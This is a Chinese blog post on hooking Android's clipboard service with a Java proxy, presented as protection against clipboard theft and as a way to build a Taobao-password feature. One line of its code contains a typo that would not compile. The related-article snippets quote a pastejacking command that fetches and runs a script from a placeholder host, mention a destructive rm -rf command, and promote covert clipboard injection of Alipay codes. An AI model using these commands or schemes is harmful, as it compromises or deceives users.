淘口令效果及粘贴板攻击防护实现

最新推荐文章于 2023-07-21 20:18:44 发布
最新推荐文章于 2023-07-21 20:18:44 发布
阅读量7.9k 收藏 1
点赞数
分类专栏: hook 文章标签: android 淘口令 剪切板 hook
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014379448/article/details/109793114
版权

淘口令效果与粘贴板攻击防护

写在前面的话 – 关于剪切板安全性的思考不感兴趣的可以跳过这段废话

  1. 早在18年360互联网中心首次监听到一类木马病毒,该类病毒不断的监听剪切板,判断是否为比特币等数字货币地址,如果是数字货币地址则将其替换成自己的地址从而实施盗窃,其实这种漏洞早在16年Telegram就暴露出应用将剪切板文本写到本地的情况,而剪切板的安全一直不为大家所关注,因此应用本身如果需要较高的防护等级的话剪切板的安全就容易变成一个薄弱环节.

如何防护

笔者从两方面考虑防护

  1. 如何防止写入到剪贴板的数据被其他应用读取并篡改
  2. 如何简单快速的进行防护而不对现有项目做过多改动

本代码局限性

由于手头并没有三星手机,且三星自己实现了一套复制粘贴的service,所以下述代码没有对三星相关品牌做兼容.诸位看官可自行实现.

直接上代码

  1. 下面的代码主要是对剪贴板的hook,在应用中如果一旦使用了剪贴板会自动的走到我们hook的地方,在此我们可以将剪贴的数据进行加密处理,或者实现淘口令的功能.具体的各位可以根据自身的业务需求实现.完整代码各位可以下载github代码,如果有用请给个star支持一下.

     package com.lhc.hook.myapplication.hook;
 import android.content.ClipData;
 import android.content.Context;
 import android.os.IBinder;
 import android.text.TextUtils;
 import android.util.Log;
 
 import com.lhc.hook.myapplication.hookutil.ServiceHook;
 import com.lhc.hook.myapplication.hookutil.ServiceManager;
 
 import java.lang.reflect.InvocationHandler;
 import java.lang.reflect.Method;
 import java.lang.reflect.Proxy;
 
 public class ClipboardHook {

 private static final String TAG = ClipboardHook.class.getSimpleName();
 private static Context mContext;

 public static void hookService(Context context) {
     mContext = context;
     IBinder clipboardService = ServiceManager.getService(Context.CLIPBOARD_SERVICE);
     String IClipboard = "android.content.IClipboard";

     if (clipboardService != null) {
         try {
             IBinder hookClipboardService =
                     (IBinder) Proxy.newProxyInstance(IBinder.class.getClassLoader(),
                             new Class[]{IBinder.class},
                             new ServiceHook(clipboardService, IClipboard, true, new ClipboardHookHandler()));
             ServiceManager.setService(Context.CLIPBOARD_SERVICE, hookClipboardService);
         } catch (Exception e) {
             e.printStackTrace();
         }
     } else {
         Log.e(TAG, "ClipboardService hook failed!");
     }
 }

 /**
  * 其实在android的粘贴板中有一个ClipData.getDescription()方法,
  * 各位甚至可以根据自己的需要对粘贴的内容进行描述,在此处就不赘述.
  */

 public static class ClipboardHookHandler implements InvocationHandler {
     @Override
     public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
         String name = method.getName();
         if ("setPrimaryClip".equals(name)) {//复制
             hookSetPrimaryClip(args);
             return method.invoke(proxy, args);
         } else if ("getPrimaryClip".equals(name)|| "getUserPrimaryClip".equal(name)) {//粘贴
             Object call = method.invoke(proxy, args);
             call = hookGetPrimaryClip(call);
             return call;
         }
         return method.invoke(proxy, args);
     }

     /**
      * hook粘贴,可对数据加密,或实现淘口令效果
      */
     private void hookSetPrimaryClip(Object[] args) {
         for (int i = 0; i < args.length; i++) {
             if (args[i] instanceof ClipData) {
                 ClipData clipData = (ClipData) args[i];
                 if (clipData != null && clipData.getItemAt(0) != null
                         && !TextUtils.isEmpty(clipData.getItemAt(0).getText())) {
                     // TODO: 2020/11/19 0019 对数据进行解密,实现淘口令功能
                     ClipData data = new ClipData(clipData.getDescription(),
                             new ClipData.Item("数据已经加密"));
                     args[i] = data;
                 }
             }
         }
     }

     /**
      * hook 粘贴 对数据进行解密或实淘口令解密功能
      */
     private Object hookGetPrimaryClip(Object call) {
         if (call instanceof ClipData) {
             ClipData encodeData = (ClipData) call;
             if (encodeData != null && encodeData.getItemAt(0) != null
                     && !TextUtils.isEmpty(encodeData.getItemAt(0).getText())) {
                 // TODO: 2020/11/19 0019 对数据进行解密对淘口令解密
                 ClipData decodeData = new ClipData(encodeData.getDescription(),
                         new ClipData.Item("数据已经解密"));
                 call = decodeData;
             }
         }
         return call;
     }
 }
 }
findAndroidViewById
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript实现复制内容到粘贴板代码
10-22
最近做了一个前端项目,其中有需求:通过button直接把input或者textarea里的值复制到粘贴板里。下面小编给大家分享JavaScript实现复制内容到粘贴板代码,需要的朋友参考下
20行JS代码实现粘贴板复制功能
01-19
作为码农都应知道, Tab , Ctrl/Cmd + A , Ctrl / Cmd + C 以及 Ctrl / Cmd + V 分别是自动聚焦、复制、粘贴的快捷键。 而对普通用户可能就不太容易了。即使用户知道剪贴板是什么,(除了)那些眼神极好或反应很快...
Pastejacking - CTRL+V粘贴劫持攻击
weixin_33979745的博客
07-03 500
安全研究人员可以使用CSS附加恶意内容至剪贴板,而不必通知用户,最终诱骗他们执行不需要的终端命令。此类攻击就是众所周知的剪贴板劫持。在大多数情况下,它是无效的,除非用户在终端内复制内容。安全研究人员Dylan Ayrey上周发布了剪贴板劫持的最新版本,该攻击是将Java作为攻击媒介,而非CSS。 这种攻击被称之为粘贴劫持,他的概念验证攻击原理与旧版CSS...
什么是剪贴板劫持-剪贴板劫持教程
简介
07-21 2928
我来写剪贴板劫持教程。剪贴板劫持是一种危险的攻击技术,借助该攻击者可以控制受害者的剪贴板并将恶意代码粘贴到目标机器中,然后攻击者控制受害者的机器。剪贴板劫持或剪贴板劫持是恶意网站用来控制受害者计算机上的剪贴板并在受害者不知情的情况下将该内容更改为恶意内容的方法。剪贴板劫持是一种漏洞利用,其中一个人的剪贴板的内容被恶意行取代,例如指向恶意 Web 服务器的链接、恶意代码或命令。示例:用户上网,他得到了一些有用的命令。该命令由用户复制,但如果它是剪贴板劫持,则用户不会复制看起来正常的有用命令。
网页复制的剪切板攻击
Tesi1a的充电桩
11-07 1642
0x00 攻击场景 在网页里copy 一段shell 代码 比如: pip install frida 实际执行: bash &amp;amp;amp;amp;amp;amp;amp;amp;lt;(curl -s -S -L http://xxx.com/xxx.sh),而且还TM的自动回车执行了。。。 0x01 实现原理: 在网页里使用js代码,改变复制的内容 &amp;amp;amp;amp;amp;amp;amp;amp;lt;html&amp;amp;amp;amp
DOM中剪贴板控制与剪贴板劫持攻击提醒
weixin_33897722的博客
05-25 509
本部分系列文章Github Repo Introduction Clipboard API HTML5实战与剖析之剪贴板事件 IE是最早支持与剪贴板相关的事件,以及通过JavaScript访问剪贴板数据的浏览器。 IE的实现成为了事实上的标准,随后Firefox 3+ 、 Chrome和Safari 2+都支持类似的事件和剪贴板的访问,...
礼金解析/口令解析工具
软件下载
04-22 888
介绍: 礼金解析/口令解析工具 口令解密工具可一键将口令文本解析还原成URL链接,可把口令转换成网址链接,方便查看商品标题,商品id,店铺名称等,不限制! 口令解析工具可一键将加密的口令代码解析还原成正常链接。 主要给用户提供电脑端查看口令内容,和打开口令里面的网址,方便检查口令中的客pid是否正确等。 还原口令或带文案的口令创建时的原始数据。 解密后包括了,口令url网址、口令标题、客pid、有优惠券时间。 网盘下载地址: http://kekewl.cc/KgjrjvfnZ1X0
替换utools粘贴板的copyq粘贴板桌面插件工具
08-18
utools的粘贴板工具要购买了,50多,2022-09-01之前半价,虽然半价,但不买立省100%,这款工具能很好的代替。 win+R打开运行,输入“shell:Common Startup”,将copyQ生成快捷方式放入打开的文件件里,即可设置为...
Ditto-粘贴板工具
最新发布
05-02
Ditto 是一款强大的 Windows 剪贴板增强工具,它支持64位操作系统,而且完全免费,绿色开源,支持中文,而且还有免安装的绿色版本。 开启 Ditto 后,不会有任何程序界面出现,它只是默默地在系统右下角弹出了一个...
微信发口令防封号指南
Michael to Learn
12-01 4409
这篇文章随时都可能删除,为了大家的利益,不要随便传播,方法失效之后可以加下面微信拉你进群,分享新的方法(注明宝交流)。
自动复制红包口令源码
10-24
把代码放到你的网站代码中,有人只需访问你的这个网页,并有点击动作,就自动复制了你的吱口令,等他打开支付宝后就弹出让领红包啦。 最近支付宝佣金活动弄的,电话短信,网络直播四处都是铺天盖地的 ,为此很多人投入大量金钱时间去做这个,有的一个月能收入几十万 有的的几千 几百的 ,其实大家不知道的是还有一部分利使用技术可以偷工减料,节省大量资本与人工,购买广告位进行推广等手段,只需有下面的这套程序就行。 脚本实现功能:当使用户打开你的网站,点击任意位置,会自动复制支付宝口令代码进入剪贴板,当使用户打开支付宝时自动触发佣金活动,非常强大,这就是为什么你有时候浏览别人的网站,再打开支付宝的时候突然提示有红包要领取!!!!!! 代码简洁易懂,完全开源,绿色无毒,推荐使用在手机网站上,这样别人打开支付宝app的时候就会有领取红包的提示啦!!! 只需要把代码加到您的网站页面,在有客户点击的情况下都可以获得支付宝红包!!
Android源码解析--ClipBoardService(粘贴板)服务详解
追yi流年
04-06 3927
ClipBoardService是Android粘贴板服务,我们的复制粘贴都需要通过这个服务来完成。 1、与ClipBoardService相关的类 如下图所示, ClipBoardService服务核心的几个类: android.content.ClipBoardManager: 继承自android.text.ClipBoardManager, 这是一个兼容性的设计, 早期android只...
奇技淫巧之粘贴板攻击
sievr的博客
03-25 611
粘贴板攻击,顾名思义,通过粘贴板攻击目标。(可搭配xss使用) 相信大家在某大型博客上复制东西,奇复制的内容后都会加上下面这串字符吧 ———————————————— 版权声明:本文为博主的原创文章,遵循****版权协议,转载请附上原文出处链接及本声明。 其原理就是通过js实现 而今天,我们要做的就是,自定义这一段内容,你可以给他改成任何你想要的命令或者代码。 比如,你从某搜索引擎上搜到的答案是 ping google.com,一条人畜无害的命令,结果粘贴出来的却是sudo rm -rf /,你看都没看就
最终实现混合app仿宝app自动识别口令 第一篇:mui混合开发获取原生剪切板内容
优哉游哉的博客
10-12 5315
<script type="text/javascript"> mui.init() mui.plusReady(function() { function copyToClip() { var Context = plus.android.importClass("android.content.Context"); v
支付宝吱口令自动复制脚本,自动复制 JavaScript 代码介绍
weixin_30897233的博客
01-08 1841
本文转自:http://www.sojson.com/blog/262.html 最近支付宝#吱口令#的信息随处可见,可谓是铺天盖地,群里发这样的信息给被踢了不少。我开始还在鄙视这些人,有几个小钱?然后有人来找我解密 JS 脚本的时候,我才找到,甚至有人几天几十万的人也有。当然这个人是资源多,他说他的手机网站流量达到每天200万 IP。所以这个对他来说其实是小钱。另外了解到的也有部分一天几百或者...
复制内容到剪贴板(复制口令
weixin_41552521的博客
08-21 738
复制内容到剪贴板 方法一 npm地址:https://www.npmjs.com/package/copy-to-clipboard 安装插件 npm i --save copy-to-clipboard 使用 #引入插件 import copy from 'copy-to-clipboard'; if(copy("复制内容")){ console.log("复制成功"); }else{ console.log("复制失败") } 方法二 npm地址:https://ww
H5实现复制口令功能
月落星河
01-15 4633
一、效果展示 二、实现 1.1 clipboard.js引入 <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.4/clipboard.min.js"></script> 1.2 设置元素 html: // id必需要跟button中的target中一直 <span clas...
再谈宝客PID被劫持之事! [复制链接]
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
再谈宝客PID被劫持之事!http://www.admin5.net/thread-4350063-1-1.html 购买宝客程序最怕的就是: 1、程序用的人太多了,信息重复遭百度封杀。宝客PID如果被劫持,那么佣金将进入别人的口袋,这已经成为不挣的事实!而且想劫持已经非常容易!比如,用户点了一个宝客链接,该肉鸡程序瞬间将浏览器停止发送请求,而此时宝联盟服务器根本没收到任何信息!该信息还
c语言 粘贴板的用法
11-30
C语言中粘贴板主要用于在程序中实现数据的复制和粘贴操作。粘贴板可以使程序在不同模块之间传递数据,也可以在程序内部复制和粘贴数据。 在使用粘贴板时,需要包含相应的头文件,如windows.h或者xlib.h。接下来可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值